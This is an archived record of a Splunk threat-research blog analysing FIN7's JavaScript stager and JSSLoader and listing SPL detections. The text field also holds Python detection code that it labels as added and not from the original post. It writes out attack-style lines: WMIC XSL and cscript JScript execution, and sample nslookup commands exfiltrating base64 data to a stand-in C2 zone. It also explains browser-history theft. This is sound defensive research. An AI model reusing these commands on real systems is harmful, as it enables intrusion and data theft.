{
	"id": "edff2cb7-cd6a-4200-ba9d-df2761c69ede",
	"created_at": "2026-04-10T03:20:37.78844Z",
	"updated_at": "2026-04-10T03:22:18.087476Z",
	"deleted_at": null,
	"sha1_hash": "b88df62e1d48b99a55146de141270aef82bc9470",
	"title": "FIN7 Tools Resurface in the Field – Splinter or Copycat? | Splunk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4626126,
	"plain_text": "FIN7 Tools Resurface in the Field – Splinter or Copycat? | Splunk\r\nBy Splunk Threat Research Team\r\nPublished: 2021-11-11 · Archived: 2026-04-10 02:32:22 UTC\r\nThis blog is part 1 and covers FIN7, a highly skilled group, and two of its tools. For a walkthrough of Remcos executed via Splunk's Attack Range Local, see part 2, Detecting Remcos Tool Used by FIN7 with Splunk.\r\nFIN7 is a well-organized criminal group composed of highly skilled individuals that targets financial institutions and the hospitality, restaurant, and gambling industries. Until recently, the latest news about this group was that three of its high-level members had been arrested and extradited to the United States.\r\nThis criminal group ran highly technical malicious campaigns that included effective compromise, exfiltration, and fraud using stolen payment cards. Another heist in the history of this group and its actors involved withdrawing money from ATMs while bypassing all controls, as seen in the video linked below.\r\nSource: Mario Mazzochi ATM Carbanak Attack\r\nCarbanak and FIN7 are usually referred to as the same group, although some security researchers believe they might be two groups using the same malware and should be tracked separately. Without going further into the question of whether they are two different groups, we can take a look at their tools, which is what we can actually measure via payload samples and research from the community.\r\nhttps://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html\r\nPage 1 of 16\n\nFIN7 is a group highly specialized in targeting specific verticals. 
These individuals carefully and thoroughly pretexted and pursued their victims, in some cases holding conversations to establish rapport in order to lure them into clicking on the malicious payloads.\r\nSource: DOJ\r\nAccording to the Department of Justice, the FIN7 group stole approximately 15 million payment card records in the United States. The group was remarkably successful as a criminal enterprise, going as far as setting up a front company posing as an information security technology firm, where it tracked its victims using off-the-shelf software such as Atlassian JIRA.\r\nDue to the notoriety, reach and sophistication of this group and the tools it uses, we will focus specifically on FIN7 tools, techniques and procedures. Recently, a tool that is a signature of this group, known as the JSS loader, has apparently resurfaced, as indicated by reports from several security research sites and security publications.\r\nGiven the earlier arrests of what were thought to be some of the main figures of this organization, we need to ask ourselves: is this a splinter of the former group trying to get its business back online, or is it a copycat reusing the former tools, rewriting them and even attempting to reuse infrastructure from past campaigns? 
Or, simply, the group was never really affected by the arrests, decided to lay low, and has now reappeared, as Recorded Future recently reported.\r\nWe do not have enough information to answer these questions; we can, however, prepare to defend against this group by looking at its tools.\r\nIn this two-part blog we address two tools used by this group: JSS Loader and Remcos.\r\nFIN7 JavaScript\r\nFIN7 is well known for using spear-phishing campaigns to compromise a machine by downloading or executing an obfuscated JavaScript as the first stage. We analyzed both old scripts and the latest one found in the wild to summarize the behaviors it may exhibit on the targeted machine.\r\nJavaScript Execution Using an .XSL File\r\nOne interesting behavior we saw in one of these variants is how it executes the malicious JavaScript. First it creates a copy of the legitimate wmic.exe in the Users\\Public folder, together with the .xsl file that it then runs with the command wmic os get /format:\"<malicious>.xsl\". Because wmic loads whatever XSL stylesheet is named after /format and evaluates the script embedded in it, the stylesheet runs inside the copied WMIC process; here it executes the actual malicious JavaScript, which is stored in a file with a .txt extension. 
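The two execution paths just described (a copied wmic.exe running an attacker-supplied .xsl, and cscript started with //e:jscript) can be checked programmatically from process-creation telemetry. The following Python is an added example written for this page, not code from the Splunk post or its detection content. It mirrors the logic of the XSL Script Execution With WMIC and Jscript Execution Using Cscript App searches listed in the Detections section, adds one rule of its own (the assumption that wmic.exe executing outside its wbem directories is the copied binary and worth flagging on its own), and runs all three over constructed Sysmon-style events whose paths and file names are placeholders rather than indicators.

```python
# Added example for this page (not code from the Splunk post or its detection
# content): process-creation rules for the wmic /format:.xsl and
# cscript //e:jscript behaviours, run over constructed Sysmon-style events.
from typing import Callable, Dict, List, Tuple

ProcEvent = Dict[str, str]  # keys: image, cmdline, parent_image, parent_cmdline

# The only legitimate homes of wmic.exe on 64-bit Windows. A copy dropped in
# Users\Public (as described above) matches neither.
WMIC_LEGIT_DIRS = ('\\windows\\system32\\wbem\\', '\\windows\\syswow64\\wbem\\')
SCRIPT_HOSTS = ('cscript.exe', 'wscript.exe')

def basename(path: str) -> str:
    # Last path component, lower-cased, so every rule is case-insensitive.
    return path.rsplit('\\', 1)[-1].lower()

def xsl_via_wmic(ev: ProcEvent) -> bool:
    # Mirrors XSL Script Execution With WMIC: wmic ... os get ... /format:...xsl
    cmd = ev['cmdline'].lower()
    return (basename(ev['image']) == 'wmic.exe'
            and 'os get' in cmd and '/format:' in cmd and '.xsl' in cmd)

def wmic_outside_wbem(ev: ProcEvent) -> bool:
    # Assumption added here, not in the post's SPL: wmic.exe executing from
    # anywhere but its wbem directories is the copied binary the loader makes.
    img = ev['image'].lower()
    return basename(img) == 'wmic.exe' and not any(d in img for d in WMIC_LEGIT_DIRS)

def jscript_via_cscript(ev: ProcEvent) -> bool:
    # Mirrors Jscript Execution Using Cscript App: the //e:jscript switch on a
    # script host, either as the process itself or as its parent.
    pairs = ((ev['image'], ev['cmdline']),
             (ev.get('parent_image', ''), ev.get('parent_cmdline', '')))
    return any(basename(img) in SCRIPT_HOSTS and '//e:jscript' in cmd.lower()
               for img, cmd in pairs)

RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    'xsl_via_wmic': xsl_via_wmic,
    'wmic_outside_wbem': wmic_outside_wbem,
    'jscript_via_cscript': jscript_via_cscript,
}

def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    # (event index, rule name) for every rule that fires, in input order.
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]

# Constructed events; the file names are placeholders, not indicators.
SAMPLE_EVENTS: List[ProcEvent] = [
    {'image': 'C:\\Users\\Public\\wmic.exe',
     'cmdline': 'wmic os get /format:\"C:\\Users\\Public\\style.xsl\"',
     'parent_image': 'C:\\Windows\\System32\\cmd.exe', 'parent_cmdline': 'cmd.exe'},
    {'image': 'C:\\Windows\\System32\\cscript.exe',
     'cmdline': 'cscript //e:jscript ibivigi.txt',
     'parent_image': 'C:\\Users\\Public\\wmic.exe',
     'parent_cmdline': 'wmic os get /format:\"style.xsl\"'},
    {'image': 'C:\\Windows\\System32\\cmd.exe', 'cmdline': 'cmd /c whoami',
     'parent_image': 'C:\\Windows\\System32\\cscript.exe',
     'parent_cmdline': 'cscript //e:jscript ibivigi.txt'},
    {'image': 'C:\\Windows\\System32\\wbem\\WMIC.exe',     # benign admin use
     'cmdline': 'wmic os get Caption,Version',
     'parent_image': 'C:\\Windows\\System32\\cmd.exe', 'parent_cmdline': 'cmd.exe'},
]

if __name__ == '__main__':
    for idx, rule_name in evaluate(SAMPLE_EVENTS):
        print(idx, rule_name, SAMPLE_EVENTS[idx]['cmdline'])
```

The fourth event is the control: a real WMIC from the wbem directory with no /format switch fires nothing, while the first event trips both the XSL rule and the out-of-place-binary rule, and the child cmd.exe in the third event is caught purely through its cscript parent, which is the case the original search covers with its parent_process clause.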
The screenshot below shows that .XSL file.\r\nWe can also see how it uses cscript.exe to execute the malicious JavaScript directly, with the command cscript //e:jscript ibivigi.txt; the //e:jscript switch selects the JScript engine explicitly, so the .txt extension does not matter.\r\nThis JS gathers information about the compromised host by running several WMI queries. Below are the WMI queries we saw during our analysis.\r\nAside from the table above, it queries the WMI class Win32_OperatingSystem to check several items, as in the screenshot below.\r\nIt checks whether UAC is enabled on the host by reading the EnableLUA registry value (under HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System) and saves the result as part of its collected data.\r\nIt also tries to gather Active Directory information by instantiating the ADSystemInfo COM object through ActiveXObject to determine whether the host is domain-joined.\r\nData Exfiltration\r\nAfter gathering all this information, the script encrypts it and sends it to its C2 server in an HTTP POST request.\r\nWe also found variants that exfiltrate the data over DNS. In that mode the script first encrypts all the gathered data, base64-encodes the result, and then runs the nslookup application with the encoded data embedded in the name it queries against the attacker's DNS server. The command is shown in the figure below.\r\nJSSLoader\r\nFIN7 also has binary backdoor tools that collect data from the compromised host and send it to a C2 server. Some variants of JSSLoader are compiled .NET assemblies and others are native C++.\r\nC2 Server Communication\r\nIn both JSSLoader samples, the backdoor communicates with its C2 server to request commands and to exfiltrate the data collected from the compromised machine. 
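The DNS exfiltration path described in the JavaScript section above (encrypt, base64-encode, then hand the encoded data to nslookup as the name to resolve) is the one exfiltration channel on this page that leaves a clear trace in process-creation logs rather than in network captures, so it is worth a detection sketch here alongside the C2 traffic of both tools. The following Python is an added example, not code from the Splunk post. It assumes one nslookup call per chunk, the chunk carried as the left-most DNS label with base64 padding stripped (the post does not show the exact format), scores each command line by label length, base64 alphabet and Shannon entropy, and reassembles the flagged chunks in log order. The payload is constructed plaintext; in a real sample the decoded bytes would be the loader's ciphertext and would still need its key.

```python
# Added example for this page (not code from the Splunk post): heuristics for
# nslookup-based exfiltration and reassembly of the carried payload.
import base64
import math
import re
from typing import List, Optional

# Assumed query layout (the post does not show the exact format):
#   nslookup <base64 chunk, padding stripped>.<attacker-controlled zone>
# Standard base64 is assumed; a real tool may use a DNS-safe alphabet instead.
NSLOOKUP_RE = re.compile('^\\s*nslookup(?:\\.exe)?\\s+(?:-\\S+\\s+)*(\\S+)', re.I)
B64_LABEL_RE = re.compile('^[A-Za-z0-9+/]+$')
CHUNK = 25  # characters of base64 per query in the constructed sample

def shannon_entropy(s: str) -> float:
    # Bits per character; 0.0 for empty input.
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))

def queried_name(cmdline: str) -> Optional[str]:
    # The name nslookup was asked to resolve, skipping -option arguments.
    m = NSLOOKUP_RE.match(cmdline)
    return m.group(1) if m else None

def is_exfil_query(cmdline: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    # Fires when the left-most label is long, base64-shaped and high-entropy;
    # ordinary host names fail at least one of the three tests.
    name = queried_name(cmdline)
    if not name or '.' not in name:
        return False
    label = name.split('.', 1)[0]
    return (len(label) >= min_len
            and B64_LABEL_RE.match(label) is not None
            and shannon_entropy(label) >= min_entropy)

def reassemble(cmdlines: List[str]) -> bytes:
    # Join flagged labels in log order, restore stripped padding, decode.
    chunks = [queried_name(c).split('.', 1)[0] for c in cmdlines if is_exfil_query(c)]
    joined = ''.join(chunks)
    joined += '=' * (-len(joined) % 4)
    return base64.b64decode(joined)

# Constructed sample. The real loader encrypts before encoding, so the decoded
# bytes would be ciphertext; plaintext is used here so the result is readable.
EXFIL_ZONE = 'c2.example'  # placeholder zone, not a real indicator
PAYLOAD = b'host=WS01;user=jdoe;domain=CORP;lua=1'
_B64 = base64.b64encode(PAYLOAD).decode().rstrip('=')
SAMPLE_CMDLINES = [
    'nslookup %s.%s' % (_B64[i:i + CHUNK], EXFIL_ZONE) for i in range(0, len(_B64), CHUNK)
] + [
    'nslookup www.microsoft.com',            # benign lookups must not fire
    'nslookup -type=mx example.org 8.8.8.8',
]

if __name__ == '__main__':
    for c in SAMPLE_CMDLINES:
        print(is_exfil_query(c), c)
    print(reassemble(SAMPLE_CMDLINES))
```

Tune min_len and min_entropy against your own nslookup baseline before deploying this logic; CDN host names with long random labels are the usual false positive, and the entropy test alone will not separate them, so in practice the zone being queried is the stronger pivot once one chunk has been spotted.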
The user-agent strings it uses in those samples are shown below:\r\n.NET-compiled JSSLoader\r\nC++-compiled JSSLoader\r\nCollection of Data\r\nLike the obfuscated JScript, it also collects data through WMI queries against Win32_ComputerSystem, Win32_Product and Win32_Process.\r\nAdditionally, both variants have a function that lists all the files on the desktop of the compromised host and sends that listing to the C2 server as well.\r\n.NET-compiled JSSLoader\r\nC++-compiled JSSLoader\r\nThe .NET version of JSSLoader also runs Windows command-line tools such as ipconfig.exe and systeminfo.exe and pipes their output into another function that collects and exfiltrates the data.\r\nTaking a Screenshot\r\nAnother feature we identified is taking a screenshot of the compromised host. The image is never written to disk; it is kept in a memory stream, base64-encoded and sent to the C2 server.\r\nParsing Browser Databases\r\nIt also has functions that parse browser information such as history and visited URLs for both Chrome and Firefox. 
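What the loader does here is ordinary SQL against the browsers' own files: Chrome keeps history in the urls table of its History database, with timestamps in microseconds since 1601-01-01 UTC, and Firefox keeps it in the moz_places table of places.sqlite, in microseconds since the Unix epoch. The following Python is an added example, not code from the Splunk post or from JSSLoader. It builds in-memory databases with those real column names and constructed rows, runs the equivalent queries, converts both timestamp formats, and also reproduces the two EventCode=4663 searches from the Detections section (a non-browser process touching the Chrome default profile or the Mozilla roaming directory) as a plain function; the Mozilla path fragment is the one in the post's search, while the Chrome fragment is the standard default-profile location and is an assumption, since that search is cut off in the post.

```python
# Added example for this page (not code from the Splunk post or from
# JSSLoader): the SQL the loader runs against browser history files, plus the
# two 4663-based checks for non-browser access to those files.
import sqlite3
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

# Column names as in Chrome's History (table urls) and Firefox's places.sqlite
# (table moz_places); the rows inserted below are constructed test data.
CHROME_SCHEMA = ('CREATE TABLE urls(id INTEGER PRIMARY KEY, url TEXT, title TEXT, '
                 'visit_count INTEGER, last_visit_time INTEGER)')
FIREFOX_SCHEMA = ('CREATE TABLE moz_places(id INTEGER PRIMARY KEY, url TEXT, title TEXT, '
                  'visit_count INTEGER, last_visit_date INTEGER)')
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def chrome_time(us: int) -> datetime:
    # Chrome stores microseconds since 1601-01-01 UTC (WebKit time).
    return WEBKIT_EPOCH + timedelta(microseconds=us)

def firefox_time(us: int) -> datetime:
    # Firefox stores microseconds since the Unix epoch.
    return datetime.fromtimestamp(us / 1_000_000, tz=timezone.utc)

def build_sample_dbs() -> Tuple[sqlite3.Connection, sqlite3.Connection]:
    chrome = sqlite3.connect(':memory:')
    chrome.execute(CHROME_SCHEMA)
    chrome.executemany('INSERT INTO urls VALUES (?,?,?,?,?)', [
        (1, 'https://intranet.example/payroll', 'Payroll', 7, 13281062400000000),
        (2, 'https://bank.example/login', 'Online banking', 3, 13281066000000000),
    ])
    firefox = sqlite3.connect(':memory:')
    firefox.execute(FIREFOX_SCHEMA)
    firefox.executemany('INSERT INTO moz_places VALUES (?,?,?,?,?)', [
        (1, 'https://mail.example/inbox', 'Inbox', 12, 1636588800000000),
    ])
    return chrome, firefox

def chrome_history(conn: sqlite3.Connection) -> List[Dict]:
    rows = conn.execute('SELECT url, title, visit_count, last_visit_time '
                        'FROM urls ORDER BY last_visit_time DESC')
    return [{'url': u, 'title': t, 'visits': v, 'last': chrome_time(ts).isoformat()}
            for u, t, v, ts in rows]

def firefox_history(conn: sqlite3.Connection) -> List[Dict]:
    rows = conn.execute('SELECT url, title, visit_count, last_visit_date '
                        'FROM moz_places ORDER BY last_visit_date DESC')
    return [{'url': u, 'title': t, 'visits': v, 'last': firefox_time(ts).isoformat()}
            for u, t, v, ts in rows]

# Detection side, mirroring the two wineventlog_security EventCode=4663
# searches: the Mozilla fragment is the one in the post's SPL; the Chrome
# fragment is the standard default-profile path (assumed, that search is cut off).
CHROME_DIR = '\\appdata\\local\\google\\chrome\\user data\\default'
FIREFOX_DIR = '\\appdata\\roaming\\mozilla'

def flags_profile_access(process_name: str, object_name: str) -> str:
    # Name of the rule that fires for one 4663 record, or '' if none.
    proc = process_name.lower().rsplit('\\', 1)[-1]
    obj = object_name.lower()
    if 'sql' in proc or proc == 'explorer.exe':   # exclusions from the SPL
        return ''
    if CHROME_DIR in obj and proc != 'chrome.exe':
        return 'non_chrome_process_accessing_chrome_default_dir'
    if FIREFOX_DIR in obj and proc != 'firefox.exe':
        return 'non_firefox_process_access_firefox_profile_dir'
    return ''

if __name__ == '__main__':
    chrome, firefox = build_sample_dbs()
    for row in chrome_history(chrome) + firefox_history(firefox):
        print(row)
    print(flags_profile_access('C:\\Users\\jdoe\\AppData\\Local\\Temp\\loader.exe',
                               'C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History'))
```

Two practical notes: a running browser holds a lock on History, so real collectors copy the file first, which is exactly the file-read the 4663 searches are built to see; and the 4663 searches only produce events if a SACL auditing read access has been set on the profile directories, so the rule is inert until that object-access auditing is configured.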
It does this by opening each browser's SQLite database directly and running SQL queries against it.\r\nParsing Chrome history\r\nParsing Firefox visited URLs\r\nDetections\r\nJscript Execution Using Cscript App (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where (Processes.parent_process_name = \"cscript.exe\" AND Processes.parent_process = \"*//e:jscript*\") OR (Proce\r\n by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processe\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nXSL Script Execution With WMIC (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process = \"*os get*\" Processes.process=\"*/format:*\" Processes.process = \"*.xsl*\"\r\n by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processe\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nNon-Chrome Process Accessing Chrome Default Dir (New)\r\n`wineventlog_security` EventCode=4663 NOT (process_name IN (\"*\\\\chrome.exe\", \"*\\\\explorer.exe\", \"*sql*\")) Objec\r\n| stats count min(_time) as firstTime max(_time) as lastTime by Object_Name Object_Type process_name Access_Mask\r\n| `security_content_ctime(firstTime)`\r\n| `security_content_ctime(lastTime)`\r\nNon-Firefox Process Access Firefox Profile Dir 
(New)\r\n`wineventlog_security` EventCode=4663\r\n NOT (process_name IN (\"*\\\\firefox.exe\", \"*\\\\explorer.exe\", \"*sql*\")) Object_Name=\"*\\\\AppData\\\\Roaming\\\\Mozilla\r\n | stats count min(_time) as firstTime max(_time) as lastTime\r\n by Object_Name Object_Type process_name Access_Mask Accesses process_id EventCode dest user\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nOffice Application Drop Executable Unit Test (New)\r\n`sysmon` EventCode=11 Image IN (\"*\\\\winword.exe\",\"*\\\\excel.exe\",\"*\\\\powerpnt.exe\",\"*\\\\mspub.exe\",\"*\\\\visio.exe\"\r\n TargetFilename IN (\"*.exe\",\"*.dll\",\"*.pif\",\"*.scr\",\"*.js\",\"*.vbs\",\"*.vbe\",\"*.ps1\") AND NOT(TargetFilename IN (\r\n | stats count min(_time) as firstTime max(_time) as lastTime by Image TargetFilename ProcessGuid dest user_id\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nCmdline Tool Not Executed In CMD Shell (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where (Processes.process_name = \"ipconfig.exe\" OR Processes.process_name = \"systeminfo.exe\")\r\n AND NOT (Processes.parent_process_name = \"cmd.exe\" OR Processes.parent_process_name = \"powershell*\" OR Process\r\n by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process_id Processe\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nCheck Elevated CMD using whoami (New)\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process = \"*whoami*\" Processes.process = \"*/group*\" Processes.process = \"* find *\" Processes.\r\n by Processes.dest Processes.user 
Processes.parent_process Processes.process_name Processes.process Processes.p\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nMS Scripting Process Loading WMI Module (New)\r\n`sysmon` EventCode=7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\fastprox.dll\", \"*\\\\wbem\r\n| stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count\r\n by Image EventCode process_name ProcessId ProcessGuid Computer | where count \u003e= 5\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nMS Scripting Process Loading Ldap Module (New)\r\n`sysmon` EventCode=7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\Wldap32.dll\", \"*\\\\adsldp\r\n| stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count\r\n by Image EventCode process_name ProcessId ProcessGuid Computer | where count \u003e= 2\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nContributors\r\nWe would like to thank the following for their contributions to this post:\r\nTeoderick Contreras\r\nRod Soto\r\nSource: https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html"
	],
	"report_names": [
		"fin7-tools-resurface-in-the-field-splinter-or-copycat.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775791237,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b88df62e1d48b99a55146de141270aef82bc9470.pdf",
		"text": "https://archive.orkl.eu/b88df62e1d48b99a55146de141270aef82bc9470.txt",
		"img": "https://archive.orkl.eu/b88df62e1d48b99a55146de141270aef82bc9470.jpg"
	}
}